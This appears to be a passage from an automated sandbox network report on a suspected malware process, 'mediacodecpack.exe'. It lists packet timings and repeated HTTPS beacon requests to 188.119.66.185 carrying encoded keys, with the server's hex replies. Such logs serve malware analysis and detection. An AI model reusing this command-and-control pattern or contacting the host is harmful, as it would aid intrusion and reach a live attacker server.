                                                                              Dec 18, 2024 13:51:10.181266069 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:10.181345940 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.181531906 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.181545019 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:10.290061951 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.290127039 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:10.290250063 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.290479898 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.290489912 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:11.743160009 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:11.743256092 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:11.743738890 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:11.743745089 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:11.743915081 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:11.743921041 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.428741932 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.428809881 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.429035902 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.429389954 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.429400921 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.540200949 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.540255070 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.540335894 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.540610075 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.540622950 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:13.997942924 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:13.998035908 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:13.998534918 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:13.998543024 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:13.998703003 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:13.998720884 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.806103945 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.806195021 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.806230068 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.806278944 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.806379080 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.806416035 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.915188074 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.915225029 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.915287018 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.915528059 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.915548086 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:16.560688019 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:16.560802937 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:16.561332941 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:16.561342955 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:16.561505079 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:16.561510086 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.242845058 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.242913008 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.242965937 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.242996931 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.287265062 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.287297010 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.431129932 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.431164980 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.431236029 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.431710005 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.431735992 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.077519894 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.083606005 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.084186077 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.084186077 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.084194899 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.084218979 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.761482000 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.761563063 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.761691093 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.761691093 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.785007000 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.785027981 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.940355062 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.940404892 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.940474987 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.944665909 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.944681883 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:21.596735954 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:21.596955061 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:21.597579002 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:21.597589016 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:21.597754955 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:21.597759962 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.288171053 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.288254023 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.288456917 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.288611889 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.288633108 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.407002926 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.407102108 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.407196045 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.407443047 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.407480955 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:23.865694046 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:23.865961075 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:23.866607904 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:23.866636038 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:23.866786957 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:23.866800070 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.562840939 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.562908888 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.562926054 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.562942028 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.562974930 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.562988043 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.563128948 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.563148022 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.680969954 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.681009054 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.681103945 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.681363106 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.681374073 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.135970116 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.136096954 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.136655092 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.136662960 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.138484955 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.138490915 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.821641922 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.821712971 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.821755886 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.821779013 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.821945906 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.821962118 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.930989981 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.931020975 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.931081057 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.931360006 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.931371927 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:28.436795950 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:28.436908007 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:28.437354088 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:28.437369108 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:28.437604904 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:28.437611103 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.120852947 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.120919943 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.120933056 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.120948076 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.120984077 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.120995998 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.124192953 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.124207973 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.243437052 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.243480921 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.243803024 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.243803024 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.243837118 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:30.915045977 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:30.915112972 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:30.915586948 CET49963443192.168.2.10188.119.66.185
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 13:49:44.712235928 CET | 1.1.1.1 | 192.168.2.10 | 0xd108 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:49:44.712235928 CET | 1.1.1.1 | 192.168.2.10 | 0xd108 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
• 188.119.66.185

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49838 | 188.119.66.185 | 443 | 7404 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:50:44 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:50:44 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:50:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:50:44 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49848 | 188.119.66.185 | 443 | 7404 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:50:46 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:50:47 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:50:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:50:47 UTC | 774 | IN | Data Raw: 32 66 61 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 37 32 66 62 36 62 66 38 65 38 31 32 32 34 66 62 38 33 64 63 31 39 33 32 63 39 61 37 65 31 36 66 65 30 34 64 64 65 37 36 37 34 62 62 33 35 63 38 64 31 65 33 66 37 38 37 61 61 30 61 66 30 64 39 62 66 35 30 31 64 32 39 39 62 31 63 61 32 39 37 34 64 35 66 36 34 63 63 34 39 36 66 63 35 32 64 36 64 62 39 63 35 66 61 64 62 36 66 34 63 31 30 33 30 32 63 33 64 34 31 62 31 66 64 64 33 31 33 61 31 62 64 32 33 32 39 32 64 35 64 30 39 31 35 37 34 39 63 39 37 30 33 34 66 32 64 34 30 33 34 62 36 64 31 36 36 63 63 63 66 37 31 31 36 38 62 62 66 37 35 36 61 34 65 66 65 62 35 32 61 61 37 66 63 31 63 32 33 66 66 34 66 37 63 37 66 32 34 38 31 32 38 64 34 36 39 39 33 65 61 35 33 37
Data Ascii: 2fa8b723c68ee18403c660fbfe038472fb6bf8e81224fb83dc1932c9a7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c3d41b1fdd313a1bd23292d5d0915749c97034f2d4034b6d166cccf71168bbf756a4efeb52aa7fc1c23ff4f7c7f248128d46993ea537


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49860 | 188.119.66.185 | 443 | 7404 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:50:52 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:50:53 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:50:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:50:53 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49866 | 188.119.66.185 | 443 | 7404 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:50:54 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:50:55 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:50:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:50:55 UTC | 630 | IN | Data Raw: 32 36 61 0d 0a 38 62 37 32 32 61 37 37 65 34 31 66 35 35 32 63 33 34 34 38 61 33 65 34 36 64 32 30 37 66 65 38 62 33 38 66 38 35 33 66 35 33 62 39 33 62 64 64 38 63 32 35 39 39 36 66 35 39 62 61 34 39 38 36 38 32 32 35 30 63 65 61 31 38 64 65 31 32 33 62 36 63 33 35 65 34 65 38 35 37 65 61 61 65 34 30 64 64 38 36 62 31 63 62 33 32 37 66 64 33 66 34 35 32 63 35 39 64 66 32 34 39 63 39 64 30 39 39 34 62 61 64 62 32 66 31 64 66 30 61 30 37 63 65 64 63 30 34 31 65 64 65 33 33 32 66 31 65 64 62 32 65 38 64 64 30 64 33 38 61 35 66 34 61 63 62 36 65 33 37 66 39 64 37 30 35 35 35 36 66 31 30 37 39 63 63 66 34 31 63 36 38 62 66 66 30 34 31 61 61 65 66 66 35 35 33 61 63 37 33 63 63 63 62 32 31 66 35 66 33 63 64 65 34 34 38 30 65 38 64 35 38 39 38 32 30 61 65 33 32
Data Ascii: 26a8b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123b6c35e4e857eaae40dd86b1cb327fd3f452c59df249c9d0994badb2f1df0a07cedc041ede332f1edb2e8dd0d38a5f4acb6e37f9d705556f1079ccf41c68bff041aaeff553ac73cccb21f5f3cde4480e8d589820ae32


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49873 | 188.119.66.185 | 443 | 7404 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:50:57 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 12:50:58 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 12:50:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 12:50:58 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.10  49881        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:50:59 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:00 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:00 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:00 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.10  49887        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:02 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:02 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:02 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:02 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.10  49896        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:04 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:05 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:05 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:05 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.10  49901        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:07 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:07 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:07 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:07 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.10  49905        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:09 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:10 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:09 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:10 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: e8b723663ec13250


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.10  49910        188.119.66.185  443               7404  C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 12:51:11 UTC  291                OUT        GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                       Host: 188.119.66.185
2024-12-18 12:51:12 UTC  200                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0 (Ubuntu)
                                                       Date: Wed, 18 Dec 2024 12:51:12 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       X-Powered-By: PHP/7.4.33
2024-12-18 12:51:12 UTC  24                 IN         Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
